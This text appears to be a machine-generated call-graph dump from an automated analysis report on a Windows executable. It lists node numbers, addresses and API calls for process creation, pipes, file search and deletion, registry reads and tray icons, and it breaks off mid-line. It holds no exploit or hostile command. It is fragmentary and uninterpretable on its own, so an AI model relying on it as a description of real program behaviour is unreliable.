95213 1eb567 39 API calls 95210->95213 95218 26b08b 95210->95218 95212 1eb567 39 API calls 95211->95212 95214 26b063 95212->95214 95217 26b0a5 95213->95217 95214->95218 95222 1eb567 39 API calls 95214->95222 95215 26b0ed 95216 1e7510 53 API calls 95215->95216 95220 26b10b 95216->95220 95221 1eb567 39 API calls 95217->95221 95218->95215 95219 1eb567 39 API calls 95218->95219 95219->95215 95296 1e7620 95220->95296 95221->95218 95224 26b078 95222->95224 95226 1eb567 39 API calls 95224->95226 95225 26b115 95227 26b11f 95225->95227 95228 26b1d8 95225->95228 95226->95218 95230 1e7510 53 API calls 95227->95230 95229 26b20a GetCurrentDirectoryW 95228->95229 95231 1e7510 53 API calls 95228->95231 95232 1ffe0b 22 API calls 95229->95232 95233 26b130 95230->95233 95234 26b1ef 95231->95234 95235 26b22f GetCurrentDirectoryW 95232->95235 95236 1e7620 22 API calls 95233->95236 95237 1e7620 22 API calls 95234->95237 95238 26b23c 95235->95238 95239 26b13a 95236->95239 95240 26b1f9 _wcslen 95237->95240 95250 26b275 95238->95250 95341 1e9c6e 95238->95341 95241 1e7510 53 API calls 95239->95241 95240->95229 95240->95250 95242 26b14b 95241->95242 95244 1e7620 22 API calls 95242->95244 95246 26b155 95244->95246 95248 1e7510 53 API calls 95246->95248 95247 1e9c6e 22 API calls 95251 26b265 95247->95251 95252 26b166 95248->95252 95249 26b287 95254 26b39a CreateProcessW 95249->95254 95255 26b2f8 95249->95255 95250->95249 95300 2507c0 95250->95300 95256 1e9c6e 22 API calls 95251->95256 95257 1e7620 22 API calls 95252->95257 95295 26b32f _wcslen 95254->95295 95355 2411c8 39 API calls 95255->95355 95256->95250 95260 26b170 95257->95260 95263 26b1a6 GetSystemDirectoryW 95260->95263 95267 1e7510 53 API calls 95260->95267 95262 26b2fd 95265 26b323 95262->95265 95266 26b32a 95262->95266 95269 1ffe0b 22 API calls 95263->95269 95356 241201 128 API calls 2 library calls 95265->95356 95357 2414ce 6 API calls 95266->95357 95271 26b187 95267->95271 95273 26b1cb GetSystemDirectoryW 95269->95273 95275 1e7620 22 API calls 95271->95275 95273->95238 95274 26b328 95274->95295 95278 26b191 _wcslen 95275->95278 95276 26b3d6 GetLastError 95283 26b41a 95276->95283 95277 26b42f CloseHandle 95279 26b43f 95277->95279 95288 26b49a 95277->95288 95278->95238 95278->95263 95281 26b446 CloseHandle 95279->95281 95282 26b451 95279->95282 95281->95282 95284 26b463 95282->95284 95285 26b458 CloseHandle 95282->95285 95338 250175 95283->95338 95286 26b475 95284->95286 95287 26b46a CloseHandle 95284->95287 95285->95284 95326 2509d9 95286->95326 95287->95286 95288->95283 95293 26b4d2 CloseHandle 95288->95293 95293->95283 95295->95276 95295->95277 95297 1e762a _wcslen 95296->95297 95298 1ffe0b 22 API calls 95297->95298 95299 1e763f 95298->95299 95299->95225 95359 25045b 95300->95359 95303 2507eb 95305 2506e6 95303->95305 95306 25045b 5 API calls 95305->95306 95307 250700 95306->95307 95308 250711 95307->95308 95309 2504d2 8 API calls 95307->95309 95310 2505a7 95308->95310 95309->95308 95311 2505c4 GetStdHandle 95310->95311 95312 2505eb 95310->95312 95313 2505da 95311->95313 95325 2505e5 95311->95325 95314 250610 GetStdHandle 95312->95314 95315 2505ef 95312->95315 95318 250371 3 API calls 95313->95318 95316 250626 CreateFileW 95314->95316 95317 250621 95314->95317 95319 2505f8 CreatePipe 95315->95319 95315->95325 95320 25064b 95316->95320 95316->95325 95317->95313 95317->95316 95318->95325 95319->95320 95321 25060b 95319->95321 95322 250371 3 API calls 95320->95322 95320->95325 95321->95325 95323 25065b 95322->95323 95324 250660 CloseHandle 95323->95324 95323->95325 95324->95325 95325->95249 95327 2509e7 95326->95327 95330 250a19 95326->95330 95329 1ffddb 22 API calls 95327->95329 95327->95330 95328 250a48 95358 26b536 25 API calls 95328->95358 95331 250a06 95329->95331 95330->95328 95332 1ffddb 22 API calls 95330->95332 95388 25011d InitializeCriticalSectionAndSpinCount 95331->95388 95334 250a3f 95332->95334 95336 25011d 5 API calls 95334->95336 95335 250a0f 95391 250944 95335->95391 95336->95328 95410 25030f 95338->95410 95342 1e9c7e 95341->95342 95343 22f545 95341->95343 95348 1ffddb 22 API calls 95342->95348 95344 22f556 95343->95344 95428 1e6b57 95343->95428 95440 1ea6c3 95344->95440 95347 22f560 95347->95347 95349 1e9c91 95348->95349 95350 1e9cac 95349->95350 95351 1e9c9a 95349->95351 95423 1ea961 95350->95423 95352 1e9cb3 22 API calls 95351->95352 95354 1e9ca2 95352->95354 95354->95247 95355->95262 95356->95274 95357->95295 95358->95288 95360 250466 95359->95360 95368 250476 95359->95368 95361 25048f CloseHandle 95360->95361 95362 25049a 95360->95362 95360->95368 95361->95362 95363 25049f CloseHandle 95362->95363 95364 2504aa 95362->95364 95363->95364 95385 250371 95364->95385 95367 250371 3 API calls 95367->95368 95368->95303 95369 2504d2 95368->95369 95370 250517 95369->95370 95371 2504ef GetStdHandle 95369->95371 95373 25053d GetStdHandle 95370->95373 95374 25051c 95370->95374 95372 250506 95371->95372 95380 250511 95371->95380 95378 250371 3 API calls 95372->95378 95376 250554 CreateFileW 95373->95376 95377 25054f 95373->95377 95375 250525 CreatePipe 95374->95375 95374->95380 95379 25057d 95375->95379 95375->95380 95376->95380 95381 250579 95376->95381 95377->95372 95377->95376 95378->95380 95382 250371 3 API calls 95379->95382 95380->95303 95381->95379 95381->95380 95383 250589 95382->95383 95383->95380 95384 25058e CloseHandle 95383->95384 95384->95380 95386 25037f GetCurrentProcess GetCurrentProcess DuplicateHandle 95385->95386 95387 25037b 95385->95387 95386->95387 95387->95367 95389 250371 3 API calls 95388->95389 95390 25015c InterlockedExchange 95389->95390 95390->95335 95392 250952 CreateThread 95391->95392 95393 250968 95391->95393 95392->95393 95394 25092a 95392->95394 95393->95330 95395 250934 95394->95395 95396 250939 95394->95396 95398 2507ef InterlockedExchange 95395->95398 95399 250820 95398->95399 95400 25081a 95398->95400 95402 1ffe0b 22 API calls 95399->95402 95401 1ffe0b 22 API calls 95400->95401 95401->95399 95403 250832 ReadFile 95402->95403 95404 250901 95403->95404 95409 250855 __fread_nolock 95403->95409 95406 25091a InterlockedExchange 95404->95406 95405 25085f EnterCriticalSection 95405->95409 95406->95396 95407 2508d2 LeaveCriticalSection ReadFile 95407->95404 95407->95409 95408 1ffe0b 22 API calls 95408->95409 95409->95404 95409->95405 95409->95407 95409->95408 95411 250321 CloseHandle 95410->95411 95412 250329 95410->95412 95411->95412 95413 250336 95412->95413 95414 25032e CloseHandle 95412->95414 95415 250343 95413->95415 95416 25033b CloseHandle 95413->95416 95414->95413 95417 250350 95415->95417 95418 250348 CloseHandle 95415->95418 95416->95415 95419 250355 CloseHandle 95417->95419 95420 25035d 95417->95420 95418->95417 95419->95420 95421 250362 CloseHandle 95420->95421 95422 25017d 95420->95422 95421->95422 95422->94953 95424 1ffe0b 22 API calls 95423->95424 95425 1ea976 95424->95425 95426 1ffddb 22 API calls 95425->95426 95427 1ea984 95426->95427 95427->95354 95429 224ba1 95428->95429 95430 1e6b67 _wcslen 95428->95430 95447 1e93b2 95429->95447 95433 1e6b7d 95430->95433 95434 1e6ba2 95430->95434 95432 224baa 95432->95432 95446 1e6f34 22 API calls 95433->95446 95436 1ffddb 22 API calls 95434->95436 95438 1e6bae 95436->95438 95437 1e6b85 __fread_nolock 95437->95344 95439 1ffe0b 22 API calls 95438->95439 95439->95437 95441 1ea6dd 95440->95441 95445 1ea6d0 95440->95445 95442 1ffddb 22 API calls 95441->95442 95443 1ea6e7 95442->95443 95444 1ffe0b 22 API calls 95443->95444 95444->95445 95445->95347 95446->95437 95448 1e93c0 95447->95448 95450 1e93c9 __fread_nolock 95447->95450 95448->95450 95451 1eaec9 95448->95451 95450->95432 95452 1eaedc 95451->95452 95456 1eaed9 __fread_nolock 95451->95456 95453 1ffddb 22 API calls 95452->95453 95454 1eaee7 95453->95454 95455 1ffe0b 22 API calls 95454->95455 95455->95456 95456->95450 95457->95041 95459 1ffddb 22 API calls 95458->95459 95460 1e5734 95459->95460 95460->95049 95462 250c5b 95461->95462 95463 1ffddb 22 API calls 95462->95463 95464 250c69 95463->95464 95465 1e9cb3 22 API calls 95464->95465 95466 250c76 95465->95466 95466->95052 95468 1ea961 22 API calls 95467->95468 95469 24d3c8 95468->95469 95470 1ea961 22 API calls 95469->95470 95471 24d3d1 95470->95471 95472 1ea961 22 API calls 95471->95472 95473 24d3da 95472->95473 95491 1e3aa2 95473->95491 95478 24d400 95503 1e525f 95478->95503 95479 1e33c6 22 API calls 95479->95478 95481 24d414 FindFirstFileW 95482 24d4a0 FindClose 95481->95482 95485 24d433 95481->95485 95487 24d4ab 95482->95487 95483 24d47b FindNextFileW 95483->95485 95484 1ea8c7 22 API calls 95484->95485 95485->95482 95485->95483 95485->95484 95545 1e6350 95485->95545 95554 1e33c6 95485->95554 95487->95057 95490 24d497 FindClose 95490->95487 95563 221f50 95491->95563 95494 1e3ace 95497 1e6b57 22 API calls 95494->95497 95495 1e3ae9 95496 1ea6c3 22 API calls 95495->95496 95498 1e3ada 95496->95498 95497->95498 95565 1e37a0 95498->95565 95501 24e199 GetFileAttributesW 95502 24d3ee 95501->95502 95502->95478 95502->95479 95504 1ea961 22 API calls 95503->95504 95505 1e5275 95504->95505 95506 1ea961 22 API calls 95505->95506 95507 1e527d 95506->95507 95508 1ea961 22 API calls 95507->95508 95509 1e5285 95508->95509 95510 1ea961 22 API calls 95509->95510 95511 1e528d 95510->95511 95512 223df5 95511->95512 95513 1e52c1 95511->95513 95514 1ea8c7 22 API calls 95512->95514 95515 1e6d25 22 API calls 95513->95515 95516 223dfe 95514->95516 95517 1e52cf 95515->95517 95518 1ea6c3 22 API calls 95516->95518 95519 1e93b2 22 API calls 95517->95519 95522 1e5304 95518->95522 95520 1e52d9 95519->95520 95520->95522 95523 1e6d25 22 API calls 95520->95523 95521 1e5349 95569 1e6d25 95521->95569 95522->95521 95524 1e5325 95522->95524 95534 223e20 95522->95534 95526 1e52fa 95523->95526 95524->95521 95582 1e4c6d 95524->95582 95527 1e93b2 22 API calls 95526->95527 95527->95522 95528 1e535a 95530 1e5370 95528->95530 95535 1ea8c7 22 API calls 95528->95535 95531 1e5384 95530->95531 95537 1ea8c7 22 API calls 95530->95537 95536 1e538f 95531->95536 95539 1ea8c7 22 API calls 95531->95539 95533 1e6b57 22 API calls 95542 223ee0 95533->95542 95534->95533 95535->95530 95540 1ea8c7 22 API calls 95536->95540 95543 1e539a 95536->95543 95537->95531 95538 1e6d25 22 API calls 95538->95521 95539->95536 95540->95543 95541 1e4c6d 22 API calls 95541->95542 95542->95521 95542->95541 95585 1e49bd 22 API calls __fread_nolock 95542->95585 95543->95481 95546 224a51 95545->95546 95547 1e6362 95545->95547 95597 1e4a88 22 API calls __fread_nolock 95546->95597 95587 1e6373 95547->95587 95550 1e636e 95550->95485 95551 224a5b 95552 224a67 95551->95552 95553 1ea8c7 22 API calls 95551->95553 95553->95552 95555 1e33dd 95554->95555 95556 2230bb 95554->95556 95603 1e33ee 95555->95603 95558 1ffddb 22 API calls 95556->95558 95560 2230c5 _wcslen 95558->95560 95559 1e33e8 DeleteFileW 95559->95483 95559->95490 95561 1ffe0b 22 API calls 95560->95561 95562 2230fe __fread_nolock 95561->95562 95564 1e3aaf GetFullPathNameW 95563->95564 95564->95494 95564->95495 95566 1e37ae 95565->95566 95567 1e93b2 22 API calls 95566->95567 95568 1e37c2 95567->95568 95568->95501 95570 1e6d34 95569->95570 95571 1e6d91 95569->95571 95570->95571 95573 1e6d3f 95570->95573 95572 1e93b2 22 API calls 95571->95572 95579 1e6d62 __fread_nolock 95572->95579 95574 1e6d5a 95573->95574 95575 224c9d 95573->95575 95586 1e6f34 22 API calls 95574->95586 95576 1ffddb 22 API calls 95575->95576 95578 224ca7 95576->95578 95580 1ffe0b 22 API calls 95578->95580 95579->95528 95581 224cda 95580->95581 95583 1eaec9 22 API calls 95582->95583 95584 1e4c78 95583->95584 95584->95521 95584->95538 95585->95542 95586->95579 95588 1e6382 95587->95588 95593 1e63b6 __fread_nolock 95587->95593 95589 224a82 95588->95589 95590 1e63a9 95588->95590 95588->95593 95592 1ffddb 22 API calls 95589->95592 95598 1ea587 95590->95598 95594 224a91 95592->95594 95593->95550 95595 1ffe0b 22 API calls 95594->95595 95596 224ac5 __fread_nolock 95595->95596 95597->95551 95599 1ea59d 95598->95599 95602 1ea598 __fread_nolock 95598->95602 95600 22f80f 95599->95600 95601 1ffe0b 22 API calls 95599->95601 95601->95602 95602->95593 95604 1e33fe _wcslen 95603->95604 95605 22311d 95604->95605 95606 1e3411 95604->95606 95608 1ffddb 22 API calls 95605->95608 95607 1ea587 22 API calls 95606->95607 95609 1e341e __fread_nolock 95607->95609 95610 223127 95608->95610 95609->95559 95611 1ffe0b 22 API calls 95610->95611 95612 223157 __fread_nolock 95611->95612 95614 1ffddb 22 API calls 95613->95614 95615 1fedda 95614->95615 95616 1e9cb3 22 API calls 95615->95616 95617 1fede5 95616->95617 95617->95083 95619 1e3862 ___scrt_fastfail 95618->95619 95645 1e4212 95619->95645 95622 1e38e8 95624 223386 Shell_NotifyIconW 95622->95624 95625 1e3906 Shell_NotifyIconW 95622->95625 95649 1e3923 95625->95649 95627 1e391c 95627->95094 95629 1e3154 95628->95629 95630 1e3104 ___scrt_fastfail 95628->95630 95629->95094 95631 1e3123 Shell_NotifyIconW 95630->95631 95631->95629 95632->95094 95634 1ffe0b 22 API calls 95633->95634 95635 1e6295 95634->95635 95636 1ffddb 22 API calls 95635->95636 95637 1e62a3 95636->95637 95637->95094 95638->95094 95640 1e62fa 95639->95640 95641 1e62c1 95639->95641 95642 1e62d4 95640->95642 95643 1ea8c7 22 API calls 95640->95643 95644 1ffddb 22 API calls 95641->95644 95642->95094 95643->95642 95644->95642 95646 2235a4 95645->95646 95647 1e38b7 95645->95647 95646->95647 95648 2235ad DestroyIcon 95646->95648 95647->95622 95671 24c874 42 API calls _strftime 95647->95671 95648->95647 95650 1e393f 95649->95650 95669 1e3a13 95649->95669 95651 1e6270 22 API calls 95650->95651 95652 1e394d 95651->95652 95653 223393 LoadStringW 95652->95653 95654 1e395a 95652->95654 95656 2233ad 95653->95656 95655 1e6b57 22 API calls 95654->95655 95657 1e396f 95655->95657 95662 1ea8c7 22 API calls 95656->95662 95665 1e3994 ___scrt_fastfail 95656->95665 95658 1e397c 95657->95658 95659 2233c9 95657->95659 95658->95656 95660 1e3986 95658->95660 95661 1e6350 22 API calls 95659->95661 95663 1e6350 22 API calls 95660->95663 95664 2233d7 95661->95664 95662->95665 95663->95665 95664->95665 95666 1e33c6 22 API calls 95664->95666 95667 1e39f9 Shell_NotifyIconW 95665->95667 95668 2233f9 95666->95668 95667->95669 95670 1e33c6 22 API calls 95668->95670 95669->95627 95670->95665 95671->95622 95673 2494c8 95672->95673 95674 1ffddb 22 API calls 95673->95674 95675 2494cf 95674->95675 95675->95122 95676->95122 95677->95122 95678->95122 95679->95135 95680->95137 95681->95141 95682 1edddc 95685 1eb710 95682->95685 95686 1eb72b 95685->95686 95687 230146 95686->95687 95688 2300f8 95686->95688 95714 1eb750 95686->95714 95726 2658a2 361 API calls 2 library calls 95687->95726 95691 230102 95688->95691 95694 23010f 95688->95694 95688->95714 95724 265d33 361 API calls 95691->95724 95693 1fedcd 22 API calls 95693->95714 95710 1eba20 95694->95710 95725 2661d0 361 API calls 2 library calls 95694->95725 95697 2303d9 95697->95697 95699 1ebbe0 40 API calls 95699->95714 95702 1eba4e 95703 230322 95729 265c0c 82 API calls 95703->95729 95710->95702 95730 25359c 82 API calls __wsopen_s 95710->95730 95711 1fd336 40 API calls 95711->95714 95712 1eec40 361 API calls 95712->95714 95713 1ea8c7 22 API calls 95713->95714 95714->95693 95714->95699 95714->95702 95714->95703 95714->95710 95714->95711 95714->95712 95714->95713 95716 1ea81b 41 API calls 95714->95716 95717 1fd2f0 40 API calls 95714->95717 95718 1fa01b 361 API calls 95714->95718 95719 200242 5 API calls __Init_thread_wait 95714->95719 95720 2000a3 29 API calls __onexit 95714->95720 95721 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95714->95721 95722 1fee53 82 API calls 95714->95722 95723 1fe5ca 361 API calls 95714->95723 95727 1eaceb 23 API calls messages 95714->95727 95728 23f6bf 23 API calls 95714->95728 95716->95714 95717->95714 95718->95714 95719->95714 95720->95714 95721->95714 95722->95714 95723->95714 95724->95694 95725->95710 95726->95714 95727->95714 95728->95714 95729->95710 95730->95697 95731 218402 95736 2181be 95731->95736 95734 21842a 95741 2181ef try_get_first_available_module 95736->95741 95738 2183ee 95755 2127ec 26 API calls pre_c_initialization 95738->95755 95740 218343 95740->95734 95748 220984 95740->95748 95744 218338 95741->95744 95751 208e0b 40 API calls 2 library calls 95741->95751 95743 21838c 95743->95744 95752 208e0b 40 API calls 2 library calls 95743->95752 95744->95740 95754 20f2d9 20 API calls __dosmaperr 95744->95754 95746 2183ab 95746->95744 95753 208e0b 40 API calls 2 library calls 95746->95753 95756 220081 95748->95756 95750 22099f 95750->95734 95751->95743 95752->95746 95753->95744 95754->95738 95755->95740 95759 22008d ___BuildCatchObject 95756->95759 95757 22009b 95814 20f2d9 20 API calls __dosmaperr 95757->95814 95759->95757 95761 2200d4 95759->95761 95760 2200a0 95815 2127ec 26 API calls pre_c_initialization 95760->95815 95767 22065b 95761->95767 95766 2200aa __wsopen_s 95766->95750 95817 22042f 95767->95817 95770 2206a6 95835 215221 95770->95835 95771 22068d 95849 20f2c6 20 API calls __dosmaperr 95771->95849 95774 220692 95850 20f2d9 20 API calls __dosmaperr 95774->95850 95775 2206ab 95776 2206b4 95775->95776 95777 2206cb 95775->95777 95851 20f2c6 20 API calls __dosmaperr 95776->95851 95848 22039a CreateFileW 95777->95848 95781 2206b9 95852 20f2d9 20 API calls __dosmaperr 95781->95852 95782 220781 GetFileType 95785 2207d3 95782->95785 95786 22078c GetLastError 95782->95786 95784 220756 GetLastError 95854 20f2a3 20 API calls 2 library calls 95784->95854 95857 21516a 21 API calls 3 library calls 95785->95857 95855 20f2a3 20 API calls 2 library calls 95786->95855 95787 220704 95787->95782 95787->95784 95853 22039a CreateFileW 95787->95853 95791 22079a CloseHandle 95791->95774 95794 2207c3 95791->95794 95793 220749 95793->95782 95793->95784 95856 20f2d9 20 API calls __dosmaperr 95794->95856 95796 2207f4 95798 220840 95796->95798 95858 2205ab 72 API calls 4 library calls 95796->95858 95797 2207c8 95797->95774 95802 22086d 95798->95802 95859 22014d 72 API calls 4 library calls 95798->95859 95801 220866 95801->95802 95804 22087e 95801->95804 95860 2186ae 95802->95860 95805 2200f8 95804->95805 95806 2208fc CloseHandle 95804->95806 95816 220121 LeaveCriticalSection __wsopen_s 95805->95816 95875 22039a CreateFileW 95806->95875 95808 220927 95809 22095d 95808->95809 95810 220931 GetLastError 95808->95810 95809->95805 95876 20f2a3 20 API calls 2 library calls 95810->95876 95812 22093d 95877 215333 21 API calls 3 library calls 95812->95877 95814->95760 95815->95766 95816->95766 95818 220450 95817->95818 95819 22046a 95817->95819 95818->95819 95885 20f2d9 20 API calls __dosmaperr 95818->95885 95878 2203bf 95819->95878 95822 22045f 95886 2127ec 26 API calls pre_c_initialization 95822->95886 95824 2204a2 95825 2204d1 95824->95825 95887 20f2d9 20 API calls __dosmaperr 95824->95887 95833 220524 95825->95833 95889 20d70d 26 API calls 2 library calls 95825->95889 95828 22051f 95830 22059e 95828->95830 95828->95833 95829 2204c6 95888 2127ec 26 API calls pre_c_initialization 95829->95888 95890 2127fc 11 API calls _abort 95830->95890 95833->95770 95833->95771 95834 2205aa 95836 21522d ___BuildCatchObject 95835->95836 95893 212f5e EnterCriticalSection 95836->95893 95839 215259 95897 215000 95839->95897 95842 2152a4 __wsopen_s 95842->95775 95843 215234 95843->95839 95844 2152c7 EnterCriticalSection 95843->95844 95846 21527b 95843->95846 95844->95846 95847 2152d4 LeaveCriticalSection 95844->95847 95894 21532a 95846->95894 95847->95843 95848->95787 95849->95774 95850->95805 95851->95781 95852->95774 95853->95793 95854->95774 95855->95791 95856->95797 95857->95796 95858->95798 95859->95801 95923 2153c4 95860->95923 95862 2186c4 95936 215333 21 API calls 3 library calls 95862->95936 95863 2186be 95863->95862 95865 2153c4 __wsopen_s 26 API calls 95863->95865 95874 2186f6 95863->95874 95869 2186ed 95865->95869 95866 2153c4 __wsopen_s 26 API calls 95870 218702 CloseHandle 95866->95870 95867 21871c 95868 21873e 95867->95868 95937 20f2a3 20 API calls 2 library calls 95867->95937 95868->95805 95872 2153c4 __wsopen_s 26 API calls 95869->95872 95870->95862 95873 21870e GetLastError 95870->95873 95872->95874 95873->95862 95874->95862 95874->95866 95875->95808 95876->95812 95877->95809 95881 2203d7 95878->95881 95879 2203f2 95879->95824 95881->95879 95891 20f2d9 20 API calls __dosmaperr 95881->95891 95882 220416 95892 2127ec 26 API calls pre_c_initialization 95882->95892 95884 220421 95884->95824 95885->95822 95886->95819 95887->95829 95888->95825 95889->95828 95890->95834 95891->95882 95892->95884 95893->95843 95905 212fa6 LeaveCriticalSection 95894->95905 95896 215331 95896->95842 95906 214c7d 95897->95906 95899 21501f 95914 2129c8 95899->95914 95900 215012 95900->95899 95913 213405 11 API calls 2 library calls 95900->95913 95903 215071 95903->95846 95904 215147 EnterCriticalSection 95903->95904 95904->95846 95905->95896 95907 214c8a __dosmaperr 95906->95907 95908 214cca 95907->95908 95909 214cb5 RtlAllocateHeap 95907->95909 95920 204ead 7 API calls 2 library calls 95907->95920 95921 20f2d9 20 API calls __dosmaperr 95908->95921 95909->95907 95911 214cc8 95909->95911 95911->95900 95913->95900 95915 2129d3 RtlFreeHeap 95914->95915 95919 2129fc _free 95914->95919 95916 2129e8 95915->95916 95915->95919 95922 20f2d9 20 API calls __dosmaperr 95916->95922 95918 2129ee GetLastError 95918->95919 95919->95903 95920->95907 95921->95911 95922->95918 95924 2153d1 95923->95924 95925 2153e6 95923->95925 95938 20f2c6 20 API calls __dosmaperr 95924->95938 95929 21540b 95925->95929 95940 20f2c6 20 API calls __dosmaperr 95925->95940 95928 2153d6 95939 20f2d9 20 API calls __dosmaperr 95928->95939 95929->95863 95930 215416 95941 20f2d9 20 API calls __dosmaperr 95930->95941 95933 2153de 95933->95863 95934 21541e 95942 2127ec 26 API calls pre_c_initialization 95934->95942 95936->95867 95937->95868 95938->95928 95939->95933 95940->95930 95941->95934 95942->95933 95943 232a00 95959 1ed7b0 messages 95943->95959 95944 1edb11 PeekMessageW 95944->95959 95945 1ed807 GetInputState 95945->95944 95945->95959 95946 231cbe TranslateAcceleratorW 95946->95959 95948 1edb8f PeekMessageW 95948->95959 95949 1eda04 timeGetTime 95949->95959 95950 1edb73 TranslateMessage DispatchMessageW 95950->95948 95951 1edbaf Sleep 95951->95959 95952 232b74 Sleep 95965 232a51 95952->95965 95955 231dda timeGetTime 96012 1fe300 95955->96012 95958 232c0b GetExitCodeProcess 95962 232c21 WaitForSingleObject 95958->95962 95963 232c37 CloseHandle 95958->95963 95959->95944 95959->95945 95959->95946 95959->95948 95959->95949 95959->95950 95959->95951 95959->95952 95959->95955 95964 1ed9d5 95959->95964 95959->95965 95971 1eec40 361 API calls 95959->95971 95972 1f1310 361 API calls 95959->95972 95975 1edd50 95959->95975 95982 1edfd0 95959->95982 96005 1fedf6 95959->96005 96010 1ebf40 361 API calls 2 library calls 95959->96010 96011 1fe551 timeGetTime 95959->96011 96015 253a2a 23 API calls 95959->96015 96016 25359c 82 API calls __wsopen_s 95959->96016 95960 2729bf GetForegroundWindow 95960->95965 95962->95959 95962->95963 95963->95965 95965->95958 95965->95959 95965->95960 95965->95964 95966 232ca9 Sleep 95965->95966 96017 265658 23 API calls 95965->96017 96018 24e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95965->96018 96019 1fe551 timeGetTime 95965->96019 96020 24d4dc 47 API calls 95965->96020 95966->95959 95971->95959 95972->95959 95976 1edd6f 95975->95976 95977 1edd83 95975->95977 96021 1ed260 95976->96021 96053 25359c 82 API calls __wsopen_s 95977->96053 95980 1edd7a 95980->95959 95981 232f75 95981->95981 95983 1ee010 95982->95983 95994 1ee0dc messages 95983->95994 96063 200242 5 API calls __Init_thread_wait 95983->96063 95986 232fca 95988 1ea961 22 API calls 95986->95988 95986->95994 95987 1ea961 22 API calls 95987->95994 95989 232fe4 95988->95989 96064 2000a3 29 API calls __onexit 95989->96064 95993 232fee 96065 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95993->96065 95994->95987 95997 1eec40 361 API calls 95994->95997 95999 1ea8c7 22 API calls 95994->95999 96000 1f04f0 22 API calls 95994->96000 96001 25359c 82 API calls 95994->96001 96002 1ee3e1 95994->96002 96061 1ea81b 41 API calls 95994->96061 96062 1fa308 361 API calls 95994->96062 96066 200242 5 API calls __Init_thread_wait 95994->96066 96067 2000a3 29 API calls __onexit 95994->96067 96068 2001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95994->96068 96069 2647d4 361 API calls 95994->96069 96070 2668c1 361 API calls 95994->96070 95997->95994 95999->95994 96000->95994 96001->95994 96002->95959 96006 1fee09 96005->96006 96007 1fee12 96005->96007 96006->95959 96007->96006 96008 1fee36 IsDialogMessageW 96007->96008 96009 23efaf GetClassLongW 96007->96009 96008->96006 96008->96007 96009->96007 96009->96008 96010->95959 96011->95959 96071 1eadf0 96012->96071 96014 1fe32f 96014->95959 96015->95959 96016->95959 96017->95965 96018->95965 96019->95965 96020->95965 96022 1eec40 361 API calls 96021->96022 96040 1ed29d 96022->96040 96023 231bc4 96060 25359c 82 API calls __wsopen_s 96023->96060 96025 1ed3c3 96027 1ed6d5 96025->96027 96029 1ed3ce 96025->96029 96026 1ed30b messages 96026->95980 96027->96026 96036 1ffe0b 22 API calls 96027->96036 96028 1ed5ff 96030 231bb5 96028->96030 96031 1ed614 96028->96031 96033 1ffddb 22 API calls 96029->96033 96059 265705 23 API calls 96030->96059 96035 1ffddb 22 API calls 96031->96035 96032 1ed4b8 96037 1ffe0b 22 API calls 96032->96037 96041 1ed3d5 __fread_nolock 96033->96041 96045 1ed46a 96035->96045 96036->96041 96048 1ed429 __fread_nolock messages 96037->96048 96038 1ffddb 22 API calls 96039 1ed3f6 96038->96039 96039->96048 96054 1ebec0 361 API calls 96039->96054 96040->96023 96040->96025 96040->96026 96040->96027 96040->96032 96042 1ffddb 22 API calls 96040->96042 96040->96048 96041->96038 96041->96039 96042->96040 96044 231ba4 96058 25359c 82 API calls __wsopen_s 96044->96058 96045->95980 96048->96028 96048->96044 96048->96045 96049 231b7f 96048->96049 96051 231b5d 96048->96051 96055 1e1f6f 361 API calls 96048->96055 96057 25359c 82 API calls __wsopen_s 96049->96057 96056 25359c 82 API calls __wsopen_s 96051->96056 96053->95981 96054->96048 96055->96048 96056->96045 96057->96045 96058->96045 96059->96023 96060->96026 96061->95994 96062->95994 96063->95986 96064->95993 96065->95994 96066->95994 96067->95994 96068->95994 96069->95994 96070->95994 96072 1eae01 96071->96072 96075 1eae1c messages 96071->96075 96073 1eaec9 22 API calls 96072->96073 96074 1eae09 CharUpperBuffW 96073->96074 96074->96075 96075->96014 96076 232f07 96077 232f11 96076->96077 96078 232f28 96076->96078 96077->96078 96080 1fe300 23 API calls 96077->96080 96082 25359c 82 API calls __wsopen_s 96078->96082 96080->96078 96081 232f41 96081->96081 96082->96081 96083 1e105b 96088 1e344d 96083->96088 96085 1e106a 96119 2000a3 29 API calls __onexit 96085->96119 96087 1e1074 96089 1e345d __wsopen_s 96088->96089 96090 1ea961 22 API calls 96089->96090 96091 1e3513 96090->96091 96120 1e3a5a 96091->96120 96093 1e351c 96127 1e3357 96093->96127 96096 1e33c6 22 API calls 96097 1e3535 96096->96097 96133 1e515f 96097->96133 96100 1ea961 22 API calls 96101 1e354d 96100->96101 96102 1ea6c3 22 API calls 96101->96102 96103 1e3556 RegOpenKeyExW 96102->96103 96104 223176 RegQueryValueExW 96103->96104 96108 1e3578 96103->96108 96105 223193 96104->96105 96106 22320c RegCloseKey 96104->96106 96107 1ffe0b 22 API calls 96105->96107 96106->96108 96118 22321e _wcslen 96106->96118 96109 2231ac 96107->96109 96108->96085 96110 1e5722 22 API calls 96109->96110 96111 2231b7 RegQueryValueExW 96110->96111 96113 2231d4 96111->96113 96115 2231ee messages 96111->96115 96112 1e4c6d 22 API calls 96112->96118 96114 1e6b57 22 API calls 96113->96114 96114->96115 96115->96106 96116 1e9cb3 22 API calls 96116->96118 96117 1e515f 22 API calls 96117->96118 96118->96108 96118->96112 96118->96116 96118->96117 96119->96087 96121 221f50 __wsopen_s 96120->96121 96122 1e3a67 GetModuleFileNameW 96121->96122 96123 1e9cb3 22 API calls 96122->96123 96124 1e3a8d 96123->96124 96125 1e3aa2 23 API calls 96124->96125 96126 1e3a97 96125->96126 96126->96093 96128 221f50 __wsopen_s 96127->96128 96129 1e3364 GetFullPathNameW 96128->96129 96130 1e3386 96129->96130 96131 1e6b57 22 API calls 96130->96131 96132 1e33a4 96131->96132 96132->96096 96134 1e516e 96133->96134 96138 1e518f __fread_nolock 96133->96138 96136 1ffe0b 22 API calls 96134->96136 96135 1ffddb 22 API calls 96137 1e3544 96135->96137 96136->96138 96137->96100 96138->96135 96139 1e1098 96144 1e42de 96139->96144 96143 1e10a7 96145 1ea961 22 API calls 96144->96145 96146 1e42f5 GetVersionExW 96145->96146 96147 1e6b57 22 API calls 96146->96147 96148 1e4342 96147->96148 96149 1e93b2 22 API calls 96148->96149 96153 1e4378 96148->96153 96150 1e436c 96149->96150 96152 1e37a0 22 API calls 96150->96152 96151 